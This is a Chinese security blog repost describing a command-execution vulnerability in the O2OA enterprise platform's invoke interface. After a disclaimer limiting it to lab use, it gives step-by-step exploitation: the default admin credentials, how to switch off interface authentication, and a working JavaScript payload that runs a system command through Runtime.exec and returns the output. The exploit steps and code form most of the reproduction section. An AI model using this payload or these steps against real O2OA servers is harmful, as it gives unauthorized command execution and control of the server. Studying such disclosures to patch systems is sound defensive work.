O2OA系统 invoke接口命令执行漏洞

admin 2022年11月4日18:33:46评论580 views字数 798阅读2分39秒阅读模式
O2OA系统 invoke接口命令执行漏洞
    文章声明

安全技术类文章仅供参考,此文所提供的信息仅针对漏洞靶场进行渗透,未经授权请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全

一、漏洞描述

O2OA 是一款 Java 开源企业信息化建设平台,包括流程管理、门户管理、信息管理、数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度。O2OA 系统后台的invoke接口存在命令执行漏洞,攻击者通过该漏洞可以获取服务器权限。

二、漏洞复现

系统地址及其首页显示如下

http://xx.xx.xx/x_desktop/index.html

O2OA系统 invoke接口命令执行漏洞

输入默认账户密码登录系统  xadmin/o2,后台显示如下

O2OA系统 invoke接口命令执行漏洞

点击左上角的logo图标,选择进入服务管理

O2OA系统 invoke接口命令执行漏洞

在服务管理的接口配置中选择cmd接口

O2OA系统 invoke接口命令执行漏洞

复制如下执行 whoami 命令的代码,并选择启用鉴权为否

var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()));var result = [];while (true) {  var oneline = bufReader.readLine();  result.push(oneline);  if (!oneline) break;}var result = { "Result": result };this.response.setBody(result, "application/json");

O2OA系统 invoke接口命令执行漏洞

保存后点击运行即可得到命令执行的回显,结果如下

O2OA系统 invoke接口命令执行漏洞

原文始发于微信公众号(守卫者安全):O2OA系统 invoke接口命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月4日18:33:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   O2OA系统 invoke接口命令执行漏洞https://cn-sec.com/archives/1390631.html

发表评论

匿名网友 填写信息